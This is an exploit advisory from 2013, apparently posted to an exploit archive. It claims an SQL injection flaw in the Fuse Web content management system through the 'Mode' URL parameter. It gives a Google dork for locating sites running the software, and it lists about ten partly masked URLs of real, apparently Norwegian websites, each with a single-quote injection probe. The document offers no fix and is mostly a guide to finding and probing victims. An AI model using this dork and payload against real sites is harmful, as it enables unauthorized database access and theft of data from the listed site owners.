|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|
|-------------------------------------------------------------------------|
| [*] Exploit Title: Fuse Web SQL Injection
|
| [*] Exploit Author: Ashiyane Digital Security Team
|
| [*] Software Link : http://www.fuse.no
|
| [*] Google Dork: intext:"Powered by Fuse Web"
|
| [*] Tested on: Windows,Linux
|
| [*] Date : 2013/09/14
|-------------------------------------------------------------------------|
| [*] Exploit 1 : Sql Injection
| [*] Location : [Target]/?HovedMenyId=&InnholdMenyId=&Mode=[Sql Injection]
|
| [*] Proof:
|
| [*] http://www.bjXom/?HovedMenyId=&InnholdMenyId=&Mode='
|
| [*] http://www.X/?HovedMenyId=&InnholdMenyId=&Mode='
|
| [*] http://wX/?HovedMenyId=&InnholdMenyId=&Mode='
|
| [*] http://wwX/?HovedMenyId=&InnholdMenyId=&Mode='
|
| [*] http://wwXno/?HovedMenyId=&InnholdMenyId=&Mode='
|
| [*] http://X.no/?HovedMenyId=&InnholdMenyId=&Mode='
|
| [*] http://wwXno/?HovedMenyId=&InnholdMenyId=&Mode='
|
| [*] http://wwXning.no/?HovedMenyId=&InnholdMenyId=&Mode='
|
| [*] http://stabbuXkk.no/?HovedMenyId=&InnholdMenyId=&Mode='
|
| [*] http://www.romXXaard.no/?HovedMenyId=&InnholdMenyId=&Mode='
|-------------------------------------------------------------------------|
| [*] Discovered By : ACC3SS
|-------------------------------------------------------------------------|
|#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#||#|